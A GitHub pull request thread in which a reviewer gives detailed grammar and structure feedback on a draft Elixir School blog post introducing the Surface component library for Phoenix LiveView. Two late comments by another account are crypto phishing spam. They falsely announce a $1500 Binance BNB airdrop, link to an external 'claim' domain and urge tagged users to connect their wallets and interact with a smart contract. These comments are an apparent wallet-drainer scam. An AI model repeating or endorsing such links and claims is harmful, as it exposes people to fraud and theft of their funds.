add the initial draft for phoenix with surface
herminiotorres/blog pull request #1
Opened 2022-04-07 13:56 UTC by herminiotorres

2022-04-07 20:38 UTC, herminiotorres commented
Hi, @SophieDeBenedetto I put the section list on a PR description for what I like to be covered.

And I decided to use gh because it will be much easier to get the final blog post and open a PR in the Elixirshool.

2022-05-13 21:16 UTC, herminiotorres commented
Hi, @SophieDeBenedetto just to let you know I finished the article. WDYT?

2022-05-16 16:02 UTC, SophieDeBenedetto requested changes
Hello! Overall this is a great post and I think it will be really beneficial to have an intro resource like this available in the Elixir School blog. A lot of my suggestions are focused on English language grammar and clarity, but I do have one broader suggestion I'd like you to consider:

While this is just the intro post and I understand you don't want to get too detailed, I'd like to see you include some more content on the benefits of Surface. I think this would fit nicely into the more hands-on tutorial section where the reader builds the "Counter" example. Think about explaining:

* What's so great about the `data` macro for defining assigns?
* Are there benefits/nice things about event handling directives in Surface?
* Can you talk a bit more about the ergonomic niceties of Surface?

Then, wrap up with a conclusion that sums up what the reader learned and what the benefits of Surface are that they've encountered so far. You conclusion can also hint at what else they can learn about and do with Surface, to get them excited to learn more.

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +# Instrumenting Phoenix with Surface
I wouldn't use the work "Instrumenting" here. "Instrumenting" tends to mean adding observability tooling like logs, metrics, or traces. Maybe something like: "Building LiveView Apps with Surface Components" ?

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +What is Surface? According to website describe itself as a server-side rendering component library for Phoenix. You can see Surface as a Template DSL to render webpages with a minimal Elixir portion.
```suggestion
What is Surface? According to the website,  Surface is a server-side rendering component library for Phoenix. You can see Surface as a Template DSL to render webpages with a minimal Elixir portion. Surface allows you to model your front-end components more intuitively. 

Let's start by taking a look at how to install and use Surface in your Phoenix project.
```

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +What is Surface? According to website describe itself as a server-side rendering component library for Phoenix. You can see Surface as a Template DSL to render webpages with a minimal Elixir portion.
I'm not sure what you mean by: `You can see Surface as a Template DSL to render webpages with a minimal Elixir portion`. Could you explain that a bit more?

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +# Instrumenting Phoenix with Surface
It's really nice when the introduction to a post tells the reader what the post will cover. This gives the reader a good idea of what they will learn and why this post is worth their time. Can you add a sentence or two like:

"In this post, I will tell you what Surface is and why it's so great. Then, you'll learn how to build a simple Surface component and use it in your Phoenix app."

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +Once, you have your phoenix(`mix phx.new my_app`) project, the next step should be add Surface as a dependency in `mix.exs`:
```suggestion
Once you have your phoenix(`mix phx.new my_app`) project, the next step is to add Surface as a dependency in your `mix.exs`:
```

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +After fetching the dependencies with `mix do deps.get, deps.compile`, you can run the `surface.init` task to update the necessary files in your project. Besides, before that it's good to run `mix hel
```suggestion
After fetching the dependencies with `mix do deps.get, deps.compile`, you can run the `surface.init` task to update the necessary files in your project. But first, run `mix help surface.init` and check out all the options it provides.
```

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +Lets checking in each file since surface have been installed and understand one by one.
```suggestion
Let's checkout each file Surface generated and understand them better, one by one.
```

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +The `.formatter.exs`, this means we don't need to take care of it how to format our surface code since the [suface_formatter](https://github.com/surface-ui/surface_formatter) can handle for us, so wh
```suggestion
Surface has changed the `.formatter.exs` file so that our Surface code will be formatted automatically  with the help of the [suface_formatter](https://github.com/surface-ui/surface_formatter). Now, when you run `mix surface.format`, all your surface code it will formatted properly.
```

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +The `assets/js/app.js`, it will import `Hooks`, and pass with liveSocket. And you can check [here](https://surface-ui.org/js_interop) how to use Hooks with surface, and in case you like to understand
```suggestion
Surface has also updated the `assets/js/app.js` file to import `Hooks`, and pass them to the call to initialize the liveSocket. You can go [here](https://surface-ui.org/js_interop) to learn how to use Hooks with Surface, and [here](https://hexdocs.pm/phoenix_live_view/js-interop.html) to learn how to use Hooks with LiveView.
```

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +Once, you have your phoenix(`mix phx.new my_app`) project, the next step should be add Surface as a dependency in `mix.exs`:
I would start a new sub-section here: "Installing Surface"

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +Lets checking in each file since surface have been installed and understand one by one.
Since you're taking a pretty deep dive into the generated files/changes that `surface init` brings, I'd start a new subsection here, "Exploring the Generated Files". Then, for each file, show a code snippet that includes the code change that the generator made before explaining that change.

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +The `config/config.exs`, it will set a `ErrorTag` form component when your form has some errors and you can see visualy on the page.
```suggestion
Next up, let's take a look at the `config/config.exs` file. <Then show the code snippet> Here, it sets an `ErrorTag` form component when your form has some errors so that you can see changeset errors for the form visually on the page.
```

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +The `config/dev.exs`, it will set a reload compilers, and what does mean? it means every time we change and save our surface component, the compiler it will compiles the newest version of our code, a
```suggestion
The Surface generator also updated the `config/dev.exs` file by adding a reload compiler for Surface. This means that every time we change and save our Surface component, the compiler will compiles the newest version of our code and reload the app so that you can see the changes without having to refresh the page in the browser.
```

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +The `lib/my_app_web.ex`, it will import the surface for all the views.
```suggestion
The Surface generator updated the `lib/my_app_web.ex` to import Surface to all of the views.
```

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +The `mix.exs`, it will have the surface compiler, for how to compile the surface code, and also raise any erro when its has, and add at least two dependencies, and it was `surface` itself, and `surfa
```suggestion
The `mix.exs` now contains the Surface compiler. So, your app now knows how to compile Surface code. That file now also includes two new dependencies--`Surface` itself and `surface_formater`.
```

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +So, last not least, let's go and implements our tradicional "hello world" in Surface.
```suggestion
Now we're ready to implement the traditional "hello world" in Surface.
```

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +We need to create a new route on `lib/my_app_web/router.ex`, and should be called:
Create a new subsection here: "Building Your First Surface Component"

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +We need to create a new route on `lib/my_app_web/router.ex`, and should be called:
```suggestion
We need to create a new route in `lib/my_app_web/router.ex`, like this:
```

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +So, last not least, let's go and implements our tradicional "hello world" in Surface.
I would introduce the thing you're building here. If you're building a simple counter example, say that.

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +And the code inside this file should be like this:
```suggestion
Your `CounterLive` live view module should look like this:
```

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +Lets see line by line and understand each one of them.
```suggestion
Let's break this down line by line to understand how Surface works.
```

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +The `use Surface.LiveView`, it just a wrapper component around `Phoenix.LiveView`. In LiveView we normally use `use MyAppWeb, :live_view`.
```suggestion
The `use Surface.LiveView` brings in the Surface behavior. Surface components are really just a wrapper around LiveView components.
```

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +The [`data`](https://surface-ui.org/data) macro its the private API for Surface components in general, this means the component doesn't receive any external data when its called, and because this is
From this sentence, its not clear what the `data` macro function does. Could you clarify that is defines what Surface calls "data assigns" and specifies what keys the component expect to be present in socket assigns? And clarify that "data assigns" are data in socket assigns that are created and managed internally in the component, as opposed to some assigns that might get passed in from the parent when the component is rendered.

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +The [`render/1`](https://hexdocs.pm/phoenix_live_view/Phoenix.LiveView.html#c:render/1) function it will rendering our template, and instead of using the `HEEX` sigil(`~H`), we re been using the Surf
```suggestion
The [`render/1`](https://hexdocs.pm/phoenix_live_view/Phoenix.LiveView.html#c:render/1) function renders our template. Since this is a Surface component, instead of using the `HEEX` sigil(`~H`), we use the Surface sigil(`~F`). Let's take a closer look at the markup we're rendered now. You'll notice that we use the `{}` for _all_ embedded code, not just  for embedded code in HTML tags. This is one of the ergonomic benefits of Surface. You'll also notice that we've added an `:on-click` event binding for the `"inc"` and `"dec"` events.  You can get more context for this handle event directive [here](https://surface-ui.org/events#using-the-:on-[event]-directive).
```

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +The [`render/1`](https://hexdocs.pm/phoenix_live_view/Phoenix.LiveView.html#c:render/1) function it will rendering our template, and instead of using the `HEEX` sigil(`~H`), we re been using the Surf
I would take the time to explain the event directives a bit more here. This feel like good content to add to an introductory post like this.

2022-05-16 16:02 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +![](./surface-count-live.mov)
It would be great to add a conclusion that wraps up what the user learned and highlight some of the benefits of working with Surface :)

2022-05-19 01:16 UTC, herminiotorres commented on 2022/instrumenting-phoenix-with-surface.md
> +What is Surface? According to website describe itself as a server-side rendering component library for Phoenix. You can see Surface as a Template DSL to render webpages with a minimal Elixir portion.
Yes, sure, I get this from the surface website, but I watch some of the oldest Marlus's talk, and he said the propose to create Surface:
- Create Surface as a Template DSL - Surface has its own template DSL, and compares with Phoenix Template, we are able to see things like `if-elseif-else`, `case`, and some other things.
- Surface use only a small subset of the Language itself instead of Phoenix Templates, Phoenix Template get a full access to the entire Language, and for front-end templates, its only make sense to have this small subset of the Language, and a unique DSL for template where it could be a bit different than the intention of a funcional language.

2022-05-19 01:19 UTC, herminiotorres commented on 2022/instrumenting-phoenix-with-surface.md
> +# Instrumenting Phoenix with Surface
I will be changing the name of the `file` and the `title` too. And I will trying my best of to improve or explain a bit more and wrap up.

Should I spiced up the conclusion to callout to follow for the next parts of this series?

2022-05-19 01:28 UTC, herminiotorres commented on 2022/instrumenting-phoenix-with-surface.md
> +The [`data`](https://surface-ui.org/data) macro its the private API for Surface components in general, this means the component doesn't receive any external data when its called, and because this is
Sure, I will explain and put on this direction has you suggest, and maybe put some comparison between a regular liveview and surface data assigns.

2022-05-25 14:52 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +# Instrumenting Phoenix with Surface
Yes I think mentioning that you plan to publish more articles on this topic in the conclusion is a good idea!

2022-05-25 14:53 UTC, SophieDeBenedetto commented on 2022/instrumenting-phoenix-with-surface.md
> +What is Surface? According to website describe itself as a server-side rendering component library for Phoenix. You can see Surface as a Template DSL to render webpages with a minimal Elixir portion.
I would give a brief definition of a "Template DSL" here for those who are unfamiliar and cut the language of "...with only a small Elixir portion". Then I think this statement will make more sense.

2022-05-26 00:03 UTC, herminiotorres commented
Hi, @SophieDeBenedetto I like to say thank you so much for what you are doing for me! ❤️ 

Also, thank you for pushing me a bit forward, and I have been learning a lot from your reviews.

And I finished all your suggestions.

2022-06-01 21:05 UTC, SophieDeBenedetto requested changes
Really nice work! I left a lot of comments but the majority of them are suggestions to improve the readability and grammar in English. I apologize if they seem overwhelming--that is was definitely not my intention! But I think you're still fairly new to long form writing in English so I tried to take a more detailed reviewing approach with regards to language.  

There are just two comments that require you to think a bit more deeply about my suggestions:

* A better explanation of the `data` macro
* In the conclusion, a bit more clarity around summing up the benefits of Surface over plain LiveView.

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +Phoenix LiveView has been updating and receiving a lot of cool functionalities and turning into a more mature and stable tool to use and build web applications.
```suggestion
Phoenix LiveView has been evolving into a more mature and stable tool for building web applications.
```

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +A few months ago, I started to learn Surface, and I surprise how Surface brings more color to LiveView applications.
```suggestion
A few months ago, I started to learn Surface, and I was surprised by how Surface brings more color to LiveView applications.
```

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
>  I decide to write a series of blog posts about Surface, and what I've learned from this journey.
```suggestion
I decided to write a series of blog posts about Surface, and what I've learned from this journey. This post is the first in that series and introduces Surface and its benefits.
```

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +So, what is Surface? The Surface is a server-side rendering component library for Phoenix, as same as LiveView in many ways, and has its own Template DSL, this means instead of you use `HEEx` templat
```suggestion
So, what is Surface? Surface is a server-side rendering component library for Phoenix. It is the same as LiveView in many ways, and has its own Template DSL. This means instead of you using HEEx templates with the `.heex` extension or the `~H` sigil, you use the `.sface` extension or the `~F()` sigil. Surface allows you to model your front-end components more intuitively with only a small Elixir portion. This means you have some new ways to structure and present your user interface. To give you one example, you can use `case` in the Surface template, also you can have more than that.
```

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +So, what is Surface? The Surface is a server-side rendering component library for Phoenix, as same as LiveView in many ways, and has its own Template DSL, this means instead of you use `HEEx` templat
I'm not sure that the `case` example really adds anything here. Without more context on this example, it leaves me feeling a bit confused. I think you could either cut that sentence or add a little more detail for clarity.

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +Before going to the fun part, let me tell you what you expect to see here.
```suggestion
Before going to the fun part, let me tell you what we'll cover in this blog post.
```

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +- You will see how to install, and initialize the Surface in your project.
```suggestion
- You will see how to install, and initialize Surface in your project.
```

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +- We will navigate and understand the diff what is patching to our project.
```suggestion
- We will navigate and understand the diffs that running the Surface generator creates in our project
```

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +- Writing our first interface and seeing if everything is working.
what do you mean by "interface"? Do you mean our first Surface component? It might be more clear to say that or to say something like: "Building our first UI with Surface"

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +- Wrap up for all we did so far.
```suggestion
- Wrap up of all we did so far.
```

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +After fetching the dependencies with `mix do deps.get, deps.compile`, you can run the `mix surface.init` task to update the necessary files in your project. Besides, before that, it's good to run `mi
```suggestion
After fetching the dependencies with `mix do deps.get, deps.compile`, you can run the `mix surface.init` task to update the necessary files in your project. Before that, it's a good ida to run `mix help surface.init` and check out all the options you can use.
```

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +The Surface has changed the `.formatter.exs` file so that our Surface code will be formatted automatically with the help of the [suface_formatter](https://github.com/surface-ui/surface_formatter). No
```suggestion
Surface has changed the `.formatter.exs` file so that our Surface code will be formatted automatically with the help of the [suface_formatter](https://github.com/surface-ui/surface_formatter). Now, when you run `mix surface.format`, all your surface code will be formatted properly.
```

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +The Surface has also updated the `assets/js/app.js` file to import `Hooks`, and pass them to the call to initialize the `liveSocket`. You can go [here](https://surface-ui.org/js_interop) to learn how
```suggestion
Surface has also updated the `assets/js/app.js` file to import `Hooks`, and pass them to the call to initialize the `liveSocket`. You can go [here](https://surface-ui.org/js_interop) to learn how to use Hooks with Surface, and [here](https://hexdocs.pm/phoenix_live_view/js-interop.html) to learn how to use Hooks with LiveView.
```

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +The Surface generator updated the `lib/acme_web.ex` to import Surface to all of the views.
```suggestion
The Surface generator updated the `lib/acme_web.ex` file to import Surface to all of the views.
```

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +The `use Surface.LiveView` brings in the Surface behavior. Surface components are just a wrapper around LiveView components.
```suggestion
The `use Surface.LiveView` line brings in the Surface behavior. Surface components are just a wrapper around LiveView components.
```

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +Before explaining what this `data` means, let's step back and remember the workflow for developing live pages with LiveView. First thing first, you need to create the [`mount/3`](https://hexdocs.pm/p
```suggestion
Before explaining what the call to the `data` macro means, let's step back and remember the workflow for developing live pages with LiveView. First things first, you need to define the [`mount/3`](https://hexdocs.pm/phoenix_live_view/Phoenix.LiveView.html#c:mount/3) function. You can do nothing in this function  but return the `{:ok, socket}` tuple, but in general, we like to bootstrap our live page with some initial state. How do we do that? We use the [`assign/2`](https://hexdocs.pm/phoenix_live_view/Phoenix.LiveView.html#assign/2) function  to add some data to the socket.
```

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +Also, the [`data`](https://surface-ui.org/data) macro was held their state in the socket's assigns. In Surface, those assigns are called data assigns.
Can you try re-phrasing this sentence a bit? I'm not sure what you're trying to explain here. Try starting by defining what the `data` macro is and how it works.

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +The [`render/1`](https://hexdocs.pm/phoenix_live_view/Phoenix.LiveView.html#c:render/1) function renders the template. Since we are using the Surface component, instead of using the `HEEx` template w
```suggestion
The [`render/1`](https://hexdocs.pm/phoenix_live_view/Phoenix.LiveView.html#c:render/1) function renders the template. Since we are defining a Surface component, instead of using the `HEEx` template with the sigil(`~H`), we use the sigil(`~F`). 

By the way, another difference between HEEx and Surface templates is the embedded dynamic parts. In HEEx, we only use the `{}` to interpolate Elixir code inside HTML attributes, otherwise, you need to keep using the older embedded notation `<%= %>`. In Surface we have a more ergonomic approach. You always use `{}` to interpolate Elixir code anywhere in your Surface template. And you can see that when we present the value in `{@count}` in our template markup above.
```

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +Now, we need to increment and decrement the value in `@count`. How are we gonna do that? It is adding bindings for __Click Events__, and what does this mean? When someone clicks the button it will tr
```suggestion
Now, we need to increment and decrement the value in `@count`. How are we going to do that? By adding bindings for __Click Events__. What does this mean? When someone clicks the button it will trigger an event on the client-side for the server to handle this event. Here we can take a look at how LiveView does that:
```

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +  +
Should the `+` here be a `-` instead since this is the decrement button?

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +The surface has this `:on-[event]` directive as the same as `phx-[event]`. In case you like to take a look at the [LiveView Bindings](https://hexdocs.pm/phoenix_live_view/bindings.html), and here you
```suggestion
DOM element bindings and event handlers work the same way in Surface component as they do in regular LiveView. Surface supports the `:on-[event]` directive in the same  way as LiveView supports `phx-[event]`. To explore this in more detail, take a look at the [LiveView Bindings](https://hexdocs.pm/phoenix_live_view/bindings.html), and compare it with [Surface Events](https://surface-ui.org/events).
```

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +Bear with us, we are almost finished and [`handle_event/3`](https://hexdocs.pm/phoenix_live_view/Phoenix.LiveView.html#c:handle_event/3) is the same for both.
```suggestion
Bear with us, we are almost finished. The last piece of our component is the [`handle_event/3`](https://hexdocs.pm/phoenix_live_view/Phoenix.LiveView.html#c:handle_event/3) functions.
```

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +For this is just the beginning we can see some differences between LiveView and Surface, and the amazing ergonomics Surface provides for us, and some of them are:
```suggestion
So far, we can see some differences between LiveView and Surface, and the amazing ergonomics Surface provides for us. Some of them are:
```

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +- An installer(initializer) where add some code for us, instead of we write for ourselves.
```suggestion
- A generator that adds some code for us, instead of writing it ourselves.
```

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +- Add the client-side bindings to trigger events.
These last two points are actually things that are the same between Surface and LiveView though, right? Or am I misunderstanding something?

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +- An installer(initializer) where add some code for us, instead of we write for ourselves.
This list calls out some of the difference between Surface and LiveView but you don't really sum up the benefits very clearly. Can you try stating one clear benefit of using Surface that the user might have been convinced of by reading this blog post?

2022-06-01 21:05 UTC, SophieDeBenedetto commented on 2022/building-liveview-apps-with-surface-components.md
> +You should try to add the reset event, and once someone clicks on the reset button, should trigger a server-side event, and this should reset the `@count` value to zero.
```suggestion
As a bonus, you could try to add a "reset" event. Once someone clicks on the reset button, it should trigger a server-side event, and this should reset the `@count` value to zero.
```

2024-01-01 18:59 UTC, anilv2k commented
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @andersonmoraix, @douglasaugusto, @Daniel-EST, @AndreonSM, @WoneyBranga, @vhfmag, @joseeduardorp, @VitorEmanoel, @mruncleleon, @wkrueger, @Daniel0liver, @rgiacobbo, @sandrosmarzaro, @dutraleonardo, @marinhomateus, @nruchs, @CarlaPaiva, @josemoraes, @abnersuhettdev, @NicolleNina, @Elielson77, @lsakamoto, @lucasolopes, @icaronunes, @leandrowferreira, @gilvaneamaro, @CleytonSM, @odeassis, @egomesbrandao, @juligaioso, @YosiaHutabarat1, @Ravatram90, @EduardFonseca, @juliao, @leticiadia, @jlfig13, @andrepxa, @courtney33, @DoyteDoyenr, @gabrielmcf, @GabrielFun, @davialvb, @brunoschmidt, @OliveirxNicolas, @tai-melo, @MarcosAC, @PSpaulojr, @lufemj, @Gonteejo, @vinicius01cs

2024-01-01 20:35 UTC, anilv2k commented
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @victorpsantos, @Croncl, @dragonares5, @heitornascimento, @Samuel-de-Oliveira, @juauzitor, @kelvinsjesus, @antoniolazaro, @emediato, @raisalomao, @jgcmarins, @lucianovictor, @YuriGimenez, @attilamonteiro, @Victor-Fiamoncini, @oyah, @ghoeugenio, @JOA0Vitor, @christian-2hu, @JoaoVLima, @pedromiguelsbs, @Trizferoli, @lucasfsilva94, @Hubiner, @josenaldo, @gab3-dev, @LindonJohnson, @ruancomelli, @DeNadaii, @johnsigma, @GabrielBrandao1618, @joaograndotto, @JSombra, @rootsdm, @axlandrade, @fredsonchaves07, @LeonardoNevado, @luiscarlossf, @LuccasSSilva, @patrickpiresdev, @paisana15, @brenogcota, @MarceloWis, @JucaRei, @GustavoTxFreitas, @JozeanneB, @NJRezini, @aweirdtrashcan, @Viniciusmoda, @edivanteixeira

2024-08-23 16:58 UTC, closed without merging